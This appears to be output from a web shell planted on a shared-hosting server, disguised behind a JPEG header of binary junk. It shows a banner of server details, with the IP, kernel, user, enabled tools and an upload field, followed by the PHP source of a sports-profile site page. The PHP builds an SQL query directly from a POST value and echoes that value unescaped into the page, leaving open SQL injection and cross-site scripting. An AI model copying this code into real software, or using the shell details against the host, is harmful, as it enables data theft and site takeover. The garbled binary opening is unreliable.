����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 18.224.43.98 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/sportsmycareer.com/ |
Upload File : |
<?php include './head.php'; $sport = $_POST['option']; ?> <body> <main> <!--Players--> <section data-background="#ffffff"> <div class="container"> <div class="row d-flex justify-content-center"> <?php $query = "SELECT * FROM `profile` WHERE `category`='$sport'"; $run = mysqli_query($conn, $query) or die(mysqli_error($conn)); if (mysqli_num_rows($run) > 0) { while ($row = mysqli_fetch_array($run)) { ?> <div class="col-lg-3 col-md-4 col-sm-6"> <div class="services-kutu2 wow fade" onclick="location.href='player.php?player=<?php echo strtolower(str_replace(' ', '-', $row['name'])); ?>';" style="cursor: pointer"> <div class="member-box wow reveal-effect"> <figure> <img src="profiles/<?php echo $row['image']; ?>" alt="Image" /> <figcaption> <h6><?php echo $row['jersey_number']; ?></h6> <p class="paragraf-sol-beyaz-orta"> <?php echo $row['name'] . ' - ' . $row['position']; ?> </p> </figcaption> </figure> </div> </div> </div> <?php } } else { ?> <div class="col-12"> <p class="sport-unavailable"><?php echo $sport; ?> Players Not Yet Added</p> </div> <?php } ?> </div> </div> </section> <div class="bosluk3"></div> </main>